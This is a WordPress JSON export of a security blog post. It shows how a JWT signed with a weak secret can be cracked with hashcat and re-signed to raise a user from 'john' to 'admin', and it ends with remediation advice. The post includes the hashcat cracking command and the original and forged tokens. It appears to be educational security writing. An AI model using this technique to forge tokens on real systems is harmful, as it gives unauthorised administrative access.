{"id":188,"date":"2020-05-23T08:36:10","date_gmt":"2020-05-23T08:36:10","guid":{"rendered":"https:\/\/shreyapohekar.com\/blogs\/?p=188"},"modified":"2022-02-09T18:54:08","modified_gmt":"2022-02-09T18:54:08","slug":"privilege-escalation-with-jwt","status":"publish","type":"post","link":"https:\/\/shreyapohekar.com\/blogs\/privilege-escalation-with-jwt\/","title":{"rendered":"How to do Privilege Escalation with JWT"},"content":{"rendered":"\n

Hello everyone!! In the previous [post]<\/a>, we discussed about what exactly are JSON Web Tokens, its components and how it works.<\/p>\n\n\n\n

In this blog post, I am gonna talk about how keeping weak secret keys could lead to privileged access rights.<\/p>\n\n\n\n

With all that said, Lets get started.<\/p>\n\n\n\n

RECAP<\/h4>\n\n\n\n

We learned in the previous [post]<\/a> that JWT is of the form <\/p>\n\n\n\n

Header.payload.signature<\/p>\n\n\n\n

Where header and payload are base64 encoded and signature is calculated based upon the header,payload, a secret and the signing algorithm(in the header)<\/p>\n\n\n\n

Why Use a strong secret??<\/h2>\n\n\n\n

The funcion by which the signature is created determines the overall security of the token. A secret key(that is only known to the server)  is an essential part of signing the signature. And thats the only parameter that is hidden from any normal user. Therefore, if the server uses a weak secret, an attacker can potentially crack that secret and recreate the jwt with the malformed payload to gain privileged access.<\/p>\n\n\n\n

Let\u2019s consider a scenario!<\/h4>\n\n\n\n

There is a user john on an application with normal user privileges. The application also has the admin user who can perform all the administrative tasks. So, just by knowing the secret key, privileges of john can be elevated by re-signing the jwt with an obfuscated payload. <\/p>\n\n\n\n

Lets walk in step by step.<\/strong><\/p>\n\n\n\n

Here is the original token components of John. As a part of payload, Its clearly visible that the key \u201cuser\u201d has the value john<\/strong>. <\/p>\n\n\n\n

{
\n “alg”: “HS256”,
\n “typ”: “JWT”
\n}
\n
\n{
\n“user”: “john”
\n}
\nHMACSHA256(
\n base64UrlEncode(header) + “.” +
\n base64UrlEncode(payload),
\n password
\n)
\n<\/p>\n\n\n\n

And the token generated is:<\/h5>\n\n\n\n

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiam9obiJ9.kkxgkYx4559EWetAD2phOxqgSe2B-nTSRXqEmoP0nXY<\/p>\n\n\n\n

The goal is to generate a token, where the key \u201cuser\u201d has value admin<\/strong>.<\/p>\n\n\n\n

 Here, I have used secret as password which is easily crackable. The secret key of jwt can be cracked using hashcat<\/strong>(as it has the module available) <\/p>\n\n\n\n

Google for hashcat example hashes, and search for jwt.<\/p>\n\n\n\n

\"\"\/<\/figure>\n\n\n\n

 There is only one mode available for jwt i.e.16500<\/strong>. <\/p>\n\n\n\n

So let’s save the above-generated jwt to a file and name it jwt.hash. Rockyou.txt is a huge dictionary of common passwords and can be used as a wordlist to crack passwords.<\/p>\n\n\n\n

# hashcat -m 16500 jwt.hash \/usr\/share\/wordlists\/rockyou.txt --force  <\/pre>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
Within no time, the password got cracked. <\/p>\n\n\n\n
So now that we know the secret, we can re-create the jwt, with user: admin<\/p>\n\n\n\n
{
 “alg”: “HS256”,
   “typ”: “JWT”
 }
 
 {
 “user”: “admin”
 }
 HMACSHA256(
   base64UrlEncode(header) + “.” +
   base64UrlEncode(payload),
   password
 )
 <\/p>\n\n\n\n
And the newly created token is:<\/p>\n\n\n\n
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.is8m3EBkfw5RqrUtrXG5mwTjjAOHhPMuxnjbpD9Fugk<\/p>\n\n\n\n
Now this token can be used as a part of authorization header to gain access to application with admin privilege.<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
Remediations??<\/p>\n\n\n\n
  1. Use a strong secret while signing the signature.<\/li>
  2.  The JWT can be encrypted, so that any normal user cant even view or transform the contents of the payload.<\/li><\/ol>\n\n\n\n
    However, it was a primitive use-case to exploit still it should not be overlooked. 
    Hope you enjoyed reading the post. I\u2019ll be back with few more attack scenarios on JWT.<\/p>\n\n\n\n
    Until then, Happy Hunting!!<\/p>\n","protected":false},"excerpt":{"rendered":"
    Using a weak password can always be problematic. Lets see how selecting a weak secret key can lead to privilege escalation in JWTs<\/p>\n","protected":false},"author":1,"featured_media":182,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"ocean_post_layout":"","ocean_both_sidebars_style":"","ocean_both_sidebars_content_width":0,"ocean_both_sidebars_sidebars_width":0,"ocean_sidebar":"","ocean_second_sidebar":"","ocean_disable_margins":"enable","ocean_add_body_class":"","ocean_shortcode_before_top_bar":"","ocean_shortcode_after_top_bar":"","ocean_shortcode_before_header":"","ocean_shortcode_after_header":"","ocean_has_shortcode":"","ocean_shortcode_after_title":"","ocean_shortcode_before_footer_widgets":"","ocean_shortcode_after_footer_widgets":"","ocean_shortcode_before_footer_bottom":"","ocean_shortcode_after_footer_bottom":"","ocean_display_top_bar":"default","ocean_display_header":"default","ocean_header_style":"","ocean_center_header_left_menu":"","ocean_custom_header_template":"","ocean_custom_logo":0,"ocean_custom_retina_logo":0,"ocean_custom_logo_max_width":0,"ocean_custom_logo_tablet_max_width":0,"ocean_custom_logo_mobile_max_width":0,"ocean_custom_logo_max_height":0,"ocean_custom_logo_tablet_max_height":0,"ocean_custom_logo_mobile_max_height":0,"ocean_header_custom_menu":"","ocean_menu_typo_font_family":"","ocean_menu_typo_font_subset":"","ocean_menu_typo_font_size":0,"ocean_menu_typo_font_size_tablet":0,"ocean_menu_typo_font_size_mobile":0,"ocean_menu_typo_font_size_unit":"px","ocean_menu_typo_font_weight":"","ocean_menu_typo_font_weight_tablet":"","ocean_menu_typo_font_weight_mobile":"","ocean_menu_typo_transform":"","ocean_menu_typo_transform_tablet":"","ocean_menu_typo_transform_mobile":"","ocean_menu_typo_line_height":0,"ocean_menu_typo_line_height_tablet":0,"ocean_menu_typo_line_height_mobile":0,"ocean_menu_typo_line_height_unit":"","ocean_menu_typo_spacing":0,"ocean_menu_typo_spacing_tablet":0,"ocean_menu_typo_spacing_mobile":0,"ocean_menu_typo_spacing_unit":"","ocean_menu_link_color":"","ocean_menu_link_color_hover":"","ocean_menu_link_color_active":"","ocean_menu_link_background":"","ocean_menu_link_hover_background":"","ocean_menu_link_active_background":"","ocean_menu_social_links_bg":"","ocean_menu_social_hover_links_bg":"","ocean_menu_social_links_color":"","ocean_menu_social_hover_links_color":"","ocean_disable_title":"default","ocean_disable_heading":"default","ocean_post_title":"","ocean_post_subheading":"","ocean_post_title_style":"","ocean_post_title_background_color":"","ocean_post_title_background":0,"ocean_post_title_bg_image_position":"","ocean_post_title_bg_image_attachment":"","ocean_post_title_bg_image_repeat":"","ocean_post_title_bg_image_size":"","ocean_post_title_height":0,"ocean_post_title_bg_overlay":0.5,"ocean_post_title_bg_overlay_color":"","ocean_disable_breadcrumbs":"default","ocean_breadcrumbs_color":"","ocean_breadcrumbs_separator_color":"","ocean_breadcrumbs_links_color":"","ocean_breadcrumbs_links_hover_color":"","ocean_display_footer_widgets":"default","ocean_display_footer_bottom":"default","ocean_custom_footer_template":"","ocean_post_oembed":"","ocean_post_self_hosted_media":"","ocean_post_video_embed":"","ocean_link_format":"","ocean_link_format_target":"self","ocean_quote_format":"","ocean_quote_format_link":"post","ocean_gallery_link_images":"on","ocean_gallery_id":[],"footnotes":""},"categories":[2,94],"tags":[92,91,90,79,89,87,93,88,82],"class_list":["post-188","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-information-security","category-jwt","tag-encryption","tag-jwe","tag-jws","tag-jwt","tag-jwt-to","tag-priviege-escalation","tag-remediations","tag-secret","tag-signature","entry","has-media"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts\/188"}],"collection":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/comments?post=188"}],"version-history":[{"count":9,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts\/188\/revisions"}],"predecessor-version":[{"id":928,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts\/188\/revisions\/928"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/media\/182"}],"wp:attachment":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/media?parent=188"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/categories?post=188"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/tags?post=188"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}